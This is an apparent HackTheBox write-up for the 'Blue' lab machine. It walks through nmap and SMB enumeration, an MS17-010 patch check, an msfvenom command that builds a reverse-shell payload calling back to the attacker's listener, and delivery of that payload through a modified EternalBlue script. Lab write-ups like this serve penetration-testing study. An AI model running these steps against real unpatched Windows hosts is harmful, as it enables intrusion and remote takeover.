HackTheBox Blue Writeup
Enjoy reading my HTB Blue Writeup
Information Gathering
Let's begin with a nmap scan to gather some information about the HTB Blue machine:
sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.40
We have three open ports:
- Port 135: Microsoft Windows RPC
- Port 139: Microsoft Windows netbios-ssn
- Port 445: Microsoft-DS (Windows 7 Professional 7601 SP1)
Okay so there does not seem to be an Active Directory running but we have a Windows machine with Windows 7 Professional SP1 installed.
Next, enumerate the SMB shares:
smbclient -L \\\\10.10.10.40\\
Without entering a password we were able to list the shares:
0Enter WORKGROUP\user's password:
1
2 Sharename Type Comment
3 --------- ---- -------
4 ADMIN$ Disk Remote Admin
5 C$ Disk Default share
6 IPC$ IPC Remote IPC
7 Share Disk
8 Users Disk
I investigated the "Share" and "Users" share but couldn't find anything interesting. Let's keep in mind that we are able to connect to those and move on.
Eternal Blue
I used the python checker script from worawit's github repository in order to check whether the HTB Blue machine got patched or is vulnerable to Eternal Blue. In fact, it didn't get patched:
0└──╼ $python checker.py 10.10.10.40 445
1Trying to connect to 10.10.10.40:445
2Target OS: Windows 7 Professional 7601 Service Pack 1
3The target is not patched
4
5=== Testing named pipes ===
6spoolss: STATUS_ACCESS_DENIED
7samr: STATUS_ACCESS_DENIED
8netlogon: STATUS_ACCESS_DENIED
9lsarpc: STATUS_ACCESS_DENIED
10browser: STATUS_ACCESS_DENIED
Generate a payload using msfvenom in order to gain a reverse tcp shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=9988 -f exe > payload.exe
Next we have to modify the send_and_execute.py
script from worawit.
Replace username=''
with username='guest'
.
Then we can start a netcat listener and send the payload to the target machine:
python send_and_execute.py 10.10.10.40 payload.exe 445
The user flag is located in C:\Users\haris\Desktop
and the root flag in the Desktop directory of Administrator.
Tags:
HTB, HackTheBox, Blue, MS17-010